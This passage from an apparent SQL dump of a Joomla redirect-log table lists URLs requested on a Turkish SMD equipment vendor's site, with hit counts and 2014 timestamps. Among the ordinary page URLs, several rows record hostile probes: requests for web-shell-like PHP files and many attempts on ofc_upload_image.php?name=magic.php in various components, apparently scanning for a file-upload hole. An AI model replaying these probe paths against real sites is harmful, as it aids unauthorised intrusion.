00:00:00',301),(6533,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=127&Itemid=134','','','',3,0,'2014-11-19 23:30:10','0000-00-00 00:00:00',301),(6534,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',4,0,'2014-11-19 23:32:19','0000-00-00 00:00:00',301),(6535,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',3,0,'2014-11-19 23:56:57','0000-00-00 00:00:00',301),(6536,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=49&Itemid=61','','','',12,0,'2014-11-20 00:04:32','0000-00-00 00:00:00',301),(6537,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=36&Itemid=37','','','',2,0,'2014-11-20 00:15:29','0000-00-00 00:00:00',301),(6538,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=39&Itemid=57','','','',3,0,'2014-11-20 00:15:56','0000-00-00 00:00:00',301),(6539,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=59&Itemid=155','','','',4,0,'2014-11-20 00:19:28','0000-00-00 00:00:00',301),(6540,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=41&Itemid=55','','','',2,0,'2014-11-20 00:20:14','0000-00-00 00:00:00',301),(6541,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',3,0,'2014-11-20 00:20:47','0000-00-00 00:00:00',301),(6542,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',4,0,'2014-11-20 00:21:43','0000-00-00 00:00:00',301),(6543,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79','','','',3,0,'2014-11-20 00:23:39','0000-00-00 00:00:00',301),(6544,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=99&Itemid=43','','','',5,0,'2014-11-20 00:30:02','0000-00-00 00:00:00',301),(6545,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=88&Itemid=100','','','',5,0,'2014-11-20 00:31:01','0000-00-00 00:00:00',301),(6546,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=112&Itemid=123','','','',9,0,'2014-11-20 00:40:09','0000-00-00 00:00:00',301),(6547,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164','','','',2,0,'2014-11-20 00:41:18','0000-00-00 00:00:00',301),(6548,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=28','','','',3,0,'2014-11-20 00:47:23','0000-00-00 00:00:00',301),(6549,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164','','','',5,0,'2014-11-20 00:58:26','0000-00-00 00:00:00',301),(6550,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=108&Itemid=119','','','',4,0,'2014-11-20 01:04:42','0000-00-00 00:00:00',301),(6551,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=56&Itemid=137','','','',3,0,'2014-11-20 01:20:29','0000-00-00 00:00:00',301),(6552,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=97&Itemid=108','','','',4,0,'2014-11-20 01:23:36','0000-00-00 00:00:00',301),(6553,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=166&Itemid=144','','','',8,0,'2014-11-20 01:28:16','0000-00-00 00:00:00',301),(6554,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=151&Itemid=152','','','',4,0,'2014-11-20 01:31:31','0000-00-00 00:00:00',301),(6555,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',3,0,'2014-11-20 01:36:24','0000-00-00 00:00:00',301),(6556,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',2,0,'2014-11-20 01:40:56','0000-00-00 00:00:00',301),(6557,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',1,0,'2014-11-20 01:42:15','0000-00-00 00:00:00',301),(6558,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=113&Itemid=125','','','',3,0,'2014-11-20 01:49:33','0000-00-00 00:00:00',301),(6559,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164','','','',3,0,'2014-11-20 01:51:30','0000-00-00 00:00:00',301),(6560,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=51&Itemid=92','','','',3,0,'2014-11-20 01:58:50','0000-00-00 00:00:00',301),(6561,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=155&Itemid=81','','','',7,0,'2014-11-20 02:02:50','0000-00-00 00:00:00',301),(6562,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=120&Itemid=116','','','',4,0,'2014-11-20 02:09:48','0000-00-00 00:00:00',301),(6563,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=46&Itemid=62','','','',4,0,'2014-11-20 02:10:56','0000-00-00 00:00:00',301),(6564,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=147&Itemid=146','','','',6,0,'2014-11-20 02:17:30','0000-00-00 00:00:00',301),(6565,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=44&Itemid=56','','','',13,0,'2014-11-20 02:18:07','0000-00-00 00:00:00',301),(6566,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=117&Itemid=128','','','',2,0,'2014-11-20 02:23:17','0000-00-00 00:00:00',301),(6567,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=152&Itemid=153','','','',2,0,'2014-11-20 02:27:50','0000-00-00 00:00:00',301),(6568,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=167&Itemid=163','','','',3,0,'2014-11-20 02:38:02','0000-00-00 00:00:00',301),(6569,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',2,0,'2014-11-20 02:41:28','0000-00-00 00:00:00',301),(6570,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=145&Itemid=147','','','',4,0,'2014-11-20 02:48:19','0000-00-00 00:00:00',301),(6571,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=158&Itemid=159','','','',4,0,'2014-11-20 03:01:54','0000-00-00 00:00:00',301),(6572,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=119&Itemid=117','','','',3,0,'2014-11-20 03:07:36','0000-00-00 00:00:00',301),(6573,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',4,0,'2014-11-20 03:08:20','0000-00-00 00:00:00',301),(6574,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=110&Itemid=121','','','',2,0,'2014-11-20 03:24:31','0000-00-00 00:00:00',301),(6575,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',2,0,'2014-11-20 03:24:43','0000-00-00 00:00:00',301),(6576,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=137&Itemid=139','','','',2,0,'2014-11-20 03:25:53','0000-00-00 00:00:00',301),(6577,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=116&Itemid=127','','','',5,0,'2014-11-20 03:26:07','0000-00-00 00:00:00',301),(6578,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',2,0,'2014-11-20 03:28:13','0000-00-00 00:00:00',301),(6579,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=90&Itemid=102','','','',3,0,'2014-11-20 03:28:36','0000-00-00 00:00:00',301),(6580,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=168&Itemid=58','','','',11,0,'2014-11-20 03:30:07','0000-00-00 00:00:00',301),(6581,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=115&Itemid=126','','','',4,0,'2014-11-20 03:30:51','0000-00-00 00:00:00',301),(6582,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=138&Itemid=140','','','',3,0,'2014-11-20 03:36:27','0000-00-00 00:00:00',301),(6583,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=53&Itemid=110','','','',3,0,'2014-11-20 03:37:10','0000-00-00 00:00:00',301),(6584,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=94&Itemid=105','','','',4,0,'2014-11-20 03:38:30','0000-00-00 00:00:00',301),(6585,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40&Itemid=60','','','',5,0,'2014-11-20 03:39:21','0000-00-00 00:00:00',301),(6586,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=87&Itemid=103','','','',4,0,'2014-11-20 03:39:39','0000-00-00 00:00:00',301),(6587,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=157&Itemid=158','','','',5,0,'2014-11-20 03:40:45','0000-00-00 00:00:00',301),(6588,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=111&Itemid=122','','','',6,0,'2014-11-20 03:41:01','0000-00-00 00:00:00',301),(6589,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=96&Itemid=107','','','',3,0,'2014-11-20 03:42:41','0000-00-00 00:00:00',301),(6590,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=87&Itemid=99','','','',12,0,'2014-11-20 03:43:11','0000-00-00 00:00:00',301),(6591,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=95&Itemid=106','','','',7,0,'2014-11-20 03:44:15','0000-00-00 00:00:00',301),(6592,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=153&Itemid=154','','','',15,0,'2014-11-20 03:45:10','0000-00-00 00:00:00',301),(6593,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=156&Itemid=157','','','',5,0,'2014-11-20 03:47:01','0000-00-00 00:00:00',301),(6594,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=124&Itemid=130','','','',2,0,'2014-11-20 03:52:21','0000-00-00 00:00:00',301),(6595,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=98&Itemid=109','','','',3,0,'2014-11-20 03:52:53','0000-00-00 00:00:00',301),(6596,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=105&Itemid=112','','','',3,0,'2014-11-20 03:53:04','0000-00-00 00:00:00',301),(6597,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=54&Itemid=114','','','',3,0,'2014-11-20 03:53:26','0000-00-00 00:00:00',301),(6598,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=43&Itemid=2','','','',1,0,'2014-11-20 03:55:01','0000-00-00 00:00:00',301),(6599,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/index.php','','http://www.3s-technologies.com.tr/index.php','',2,0,'2014-11-20 04:58:37','0000-00-00 00:00:00',301),(6600,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/administrator/','','','',3,0,'2014-11-21 16:55:30','0000-00-00 00:00:00',301),(6601,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/administrator','','','',3,0,'2014-11-21 16:55:32','0000-00-00 00:00:00',301),(6602,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',4,0,'2014-11-21 21:19:37','0000-00-00 00:00:00',301),(6603,'http://3s-technologies.com.tr/index.php/en/administrator/','','','',17,0,'2014-11-21 21:40:38','0000-00-00 00:00:00',301),(6604,'http://3s-technologies.com.tr/index.php/en/administrator','','','',16,0,'2014-11-21 21:41:31','0000-00-00 00:00:00',301),(6605,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/pr','','','',2,0,'2014-11-22 06:20:39','0000-00-00 00:00:00',301),(6606,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',1,0,'2014-11-22 12:00:39','0000-00-00 00:00:00',301),(6607,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',3,0,'2014-11-22 14:47:59','0000-00-00 00:00:00',301),(6608,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',4,0,'2014-11-22 14:59:11','0000-00-00 00:00:00',301),(6609,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',5,0,'2014-11-23 09:03:31','0000-00-00 00:00:00',301),(6610,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',2,0,'2014-11-23 09:43:41','0000-00-00 00:00:00',301),(6611,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',5,0,'2014-11-24 01:48:15','0000-00-00 00:00:00',301),(6612,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',3,0,'2014-11-24 03:05:42','0000-00-00 00:00:00',301),(6613,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/images/stories/petx.php?baca?bajak','','','',1,0,'2014-11-24 21:19:49','0000-00-00 00:00:00',301),(6614,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/images/stories/explore.php?baca?bajak','','','',1,0,'2014-11-24 21:19:58','0000-00-00 00:00:00',301),(6615,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/images/stories/wawalo.php.png','','','',1,0,'2014-11-24 21:20:21','0000-00-00 00:00:00',301),(6616,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/images/stories/wawalo.php.png?baca','','','',1,0,'2014-11-24 21:20:22','0000-00-00 00:00:00',301),(6617,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',4,0,'2014-11-24 21:36:59','0000-00-00 00:00:00',301),(6618,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/','','','',1,0,'2014-11-25 14:49:29','0000-00-00 00:00:00',301),(6619,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116','','','',2,0,'2014-11-25 22:50:33','0000-00-00 00:00:00',301),(6620,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',9,0,'2014-11-26 01:09:08','0000-00-00 00:00:00',301),(6621,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',2,0,'2014-11-26 04:52:05','0000-00-00 00:00:00',301),(6622,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',3,0,'2014-11-26 05:37:22','0000-00-00 00:00:00',301),(6623,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',1,0,'2014-11-27 15:38:52','0000-00-00 00:00:00',301),(6624,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151','','','',1,0,'2014-11-27 23:31:47','0000-00-00 00:00:00',301),(6625,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151','','','',1,0,'2014-11-27 23:47:28','0000-00-00 00:00:00',301),(6626,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',1,0,'2014-11-28 00:17:05','0000-00-00 00:00:00',301),(6627,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',1,0,'2014-11-28 17:40:08','0000-00-00 00:00:00',301),(6628,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',1,0,'2014-11-29 02:26:11','0000-00-00 00:00:00',301),(6629,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117','','','',1,0,'2014-11-29 10:35:55','0000-00-00 00:00:00',301),(6630,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',2,0,'2014-11-29 16:03:06','0000-00-00 00:00:00',301),(6631,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',3,0,'2014-11-30 01:47:29','0000-00-00 00:00:00',301),(6632,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','https://www.led-bazaar.net/','',2,0,'2014-11-30 02:09:05','0000-00-00 00:00:00',301),(6633,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156','','','',1,0,'2014-12-01 13:51:18','0000-00-00 00:00:00',301),(6634,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156','','','',1,0,'2014-12-01 14:11:44','0000-00-00 00:00:00',301),(6635,'http://proneo-led.com/3s-technologies.com.tr/joomla//index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2','','','',3,0,'2014-12-01 18:21:51','0000-00-00 00:00:00',301),(6636,'http://www.3s-technologies.com.tr//index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2','','','',3,0,'2014-12-01 19:20:45','0000-00-00 00:00:00',301),(6637,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',1,0,'2014-12-04 12:46:01','0000-00-00 00:00:00',301),(6638,'http://3s-technologies.com.tr/index.php/en/?Itemid=115&catid=54:pcb-ve-stensil-temizleme-makineleri&id=121:trident&lang=en&option=com_content&view=article','','','',4,0,'2014-12-05 03:06:07','0000-00-00 00:00:00',301),(6639,'http://3s-technologies.com.tr/index.php/en/?Itemid=160&catid=44:pota&id=164:ews-310&lang=en&option=com_content&view=article','','','',8,0,'2014-12-05 03:06:13','0000-00-00 00:00:00',301),(6640,'http://3s-technologies.com.tr/index.php/en/?Itemid=129&id=122&lang=en&option=com_content&view=article','','','',2,0,'2014-12-05 06:12:28','0000-00-00 00:00:00',301),(6641,'http://3s-technologies.com.tr/index.php/en/?Itemid=55&id=41:smd-firin&lang=en&layout=default&option=com_content&view=category','','','',8,0,'2014-12-05 06:18:40','0000-00-00 00:00:00',301),(6642,'http://3s-technologies.com.tr/index.php/en/?Itemid=163&catid=41:smd-firin&id=167:lr4&lang=en&option=com_content&view=article','','','',4,0,'2014-12-05 06:18:56','0000-00-00 00:00:00',301),(6643,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/images/stories/food.php?rf','','','',1,0,'2014-12-05 06:37:47','0000-00-00 00:00:00',301),(6644,'http://3s-technologies.com.tr/index.php/en/?Itemid=160&catid=44:pota&id=164:ews-310&lang=tr&option=com_content&view=article','','','',4,0,'2014-12-05 07:47:42','0000-00-00 00:00:00',301),(6645,'http://3s-technologies.com.tr/index.php/en/?Itemid=28&catid=1:son-haberler&id=91:osai-neo&lang=en&option=com_content&view=article','','','',10,0,'2014-12-05 07:47:46','0000-00-00 00:00:00',301),(6646,'http://3s-technologies.com.tr/index.php/en/?Itemid=37&id=36:orta-hizli&lang=en&layout=default&option=com_content&view=category','','','',10,0,'2014-12-05 07:54:41','0000-00-00 00:00:00',301),(6647,'http://3s-technologies.com.tr/index.php/en/?Itemid=81&catid=44:pota&id=155:ct-3000n&lang=en&option=com_content&view=article','','','',4,0,'2014-12-05 07:54:45','0000-00-00 00:00:00',301),(6648,'http://3s-technologies.com.tr/index.php/en/?Itemid=148&catid=57:screen-printer&id=146:manual-printer&lang=tr&option=com_content&view=article','','','',4,0,'2014-12-05 09:30:43','0000-00-00 00:00:00',301),(6649,'http://3s-technologies.com.tr/index.php/en/?Itemid=1&id=55:katalog&lang=tr&layout=default&option=com_content&view=category','','','',2,0,'2014-12-05 11:06:42','0000-00-00 00:00:00',301),(6650,'http://3s-technologies.com.tr/index.php/en/?Itemid=124&catid=40:temizleme&id=114:stensil-temizleme-rulolari-microwipe&lang=en&option=com_content&view=article','','','',4,0,'2014-12-05 12:42:42','0000-00-00 00:00:00',301),(6651,'http://3s-technologies.com.tr/index.php/en/?Itemid=145&id=57:screen-printer&lang=en&layout=default&option=com_content&view=category','','','',11,0,'2014-12-05 12:42:43','0000-00-00 00:00:00',301),(6652,'http://3s-technologies.com.tr/index.php/en/?Itemid=164&catid=60:ikinciel&id=172:avb1&lang=en&option=com_content&view=article','','','',4,0,'2014-12-05 14:18:29','0000-00-00 00:00:00',301),(6653,'http://3s-technologies.com.tr/index.php/en/?Itemid=92&id=51:neo&lang=en&layout=default&option=com_content&view=category','','','',6,0,'2014-12-05 15:55:20','0000-00-00 00:00:00',301),(6654,'http://3s-technologies.com.tr/index.php/en/?Itemid=112&catid=41:smd-firin&id=105:r-500&lang=en&option=com_content&view=article','','','',7,0,'2014-12-05 17:30:57','0000-00-00 00:00:00',301),(6655,'http://3s-technologies.com.tr/index.php/en/?Itemid=28&catid=1:son-haberler&id=91:osai-neo&lang=tr&option=com_content&view=article','','','',7,0,'2014-12-05 19:07:47','0000-00-00 00:00:00',301),(6656,'http://3s-technologies.com.tr/index.php/en/?Itemid=60&id=40:temizleme&lang=en&layout=default&limitstart=10&option=com_content&view=category','','','',4,0,'2014-12-05 20:27:27','0000-00-00 00:00:00',301),(6657,'http://3s-technologies.com.tr/index.php/en/?Itemid=62&id=46:konveyorler&lang=en&layout=default&option=com_content&view=category','','','',8,0,'2014-12-05 20:43:26','0000-00-00 00:00:00',301),(6658,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',22,0,'2014-12-05 21:43:49','0000-00-00 00:00:00',301),(6659,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&limitstart=5','','','',4,0,'2014-12-05 23:25:25','0000-00-00 00:00:00',301),(6660,'http://3s-technologies.com.tr/index.php/en/?Itemid=159&id=158&lang=tr&option=com_content&view=article','','','',2,0,'2014-12-05 23:37:33','0000-00-00 00:00:00',301),(6661,'http://3s-technologies.com.tr/index.php/en/?Itemid=149&id=58:dusuk-hizli-smd-dizgi&lang=tr&layout=default&option=com_content&view=category','','','',4,0,'2014-12-06 04:22:40','0000-00-00 00:00:00',301),(6662,'http://3s-technologies.com.tr/index.php/en/?Itemid=60&id=40:temizleme&lang=tr&layout=default&option=com_content&view=category','','','',4,0,'2014-12-06 04:44:55','0000-00-00 00:00:00',301),(6663,'http://3s-technologies.com.tr/index.php/en/?Itemid=82&id=73&lang=en&option=com_content&view=article','','','',4,0,'2014-12-06 04:44:58','0000-00-00 00:00:00',301),(6664,'http://3s-technologies.com.tr/index.php/en/?Itemid=153&id=152&lang=en&option=com_content&view=article','','','',4,0,'2014-12-06 07:33:09','0000-00-00 00:00:00',301),(6665,'http://3s-technologies.com.tr/index.php/en/?Itemid=153&catid=58:dusuk-hizli-smd-dizgi&id=152:ls60&lang=en&option=com_content&view=article','','','',4,0,'2014-12-06 07:33:17','0000-00-00 00:00:00',301),(6666,'http://3s-technologies.com.tr/index.php/en/?Itemid=1&id=47:aoi&lang=en&layout=default&option=com_content&view=category','','','',10,0,'2014-12-06 12:45:06','0000-00-00 00:00:00',301),(6667,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',15,0,'2014-12-06 12:54:10','0000-00-00 00:00:00',301),(6668,'http://www.3s-technologies.com.tr/index.php/en/homepage2/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-12-06 13:05:47','0000-00-00 00:00:00',301),(6669,'http://www.3s-technologies.com.tr/index.php/en/homepage2/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-12-06 13:05:49','0000-00-00 00:00:00',301),(6670,'http://www.3s-technologies.com.tr/index.php/en/homepage2/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-12-06 13:05:49','0000-00-00 00:00:00',301),(6671,'http://www.3s-technologies.com.tr/index.php/en/homepage2/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-12-06 13:05:50','0000-00-00 00:00:00',301),(6672,'http://www.3s-technologies.com.tr/index.php/en/homepage2/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-12-06 13:05:50','0000-00-00 00:00:00',301),(6673,'http://www.3s-technologies.com.tr/index.php/en/homepage2/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-12-06 13:05:51','0000-00-00 00:00:00',301),(6674,'http://www.3s-technologies.com.tr/index.php/en/homepage2/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-12-06 13:05:51','0000-00-00 00:00:00',301),(6675,'http://www.3s-technologies.com.tr/index.php/en/homepage2/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-12-06 13:05:52','0000-00-00 00:00:00',301),(6676,'http://www.3s-technologies.com.tr/index.php/en/homepage2/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-12-06 13:05:53','0000-00-00 00:00:00',301),(6677,'http://www.3s-technologies.com.tr/index.php/en/homepage2/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-12-06 13:05:53','0000-00-00 00:00:00',301),(6678,'http://www.3s-technologies.com.tr/index.php/en/homepage2/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-12-06 13:05:54','0000-00-00 00:00:00',301),(6679,'http://www.3s-technologies.com.tr/index.php/en/homepage2/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-12-06 13:05:54','0000-00-00 00:00:00',301),(6680,'http://www.3s-technologies.com.tr/index.php/en/homepage2/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-12-06 13:05:55','0000-00-00 00:00:00',301),(6681,'http://www.3s-technologies.com.tr/index.php/en/homepage2/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-12-06 13:05:55','0000-00-00 00:00:00',301),(6682,'http://www.3s-technologies.com.tr/index.php/en/homepage2/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-12-06 13:05:55','0000-00-00 00:00:00',301),(6683,'http://www.3s-technologies.com.tr/index.php/en/homepage2/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-12-06 13:05:56','0000-00-00 00:00:00',301),(6684,'http://www.3s-technologies.com.tr/index.php/en/homepage2/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-12-06 13:05:56','0000-00-00 00:00:00',301),(6685,'http://www.3s-technologies.com.tr/index.php/en/homepage2/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-12-06 13:05:57','0000-00-00 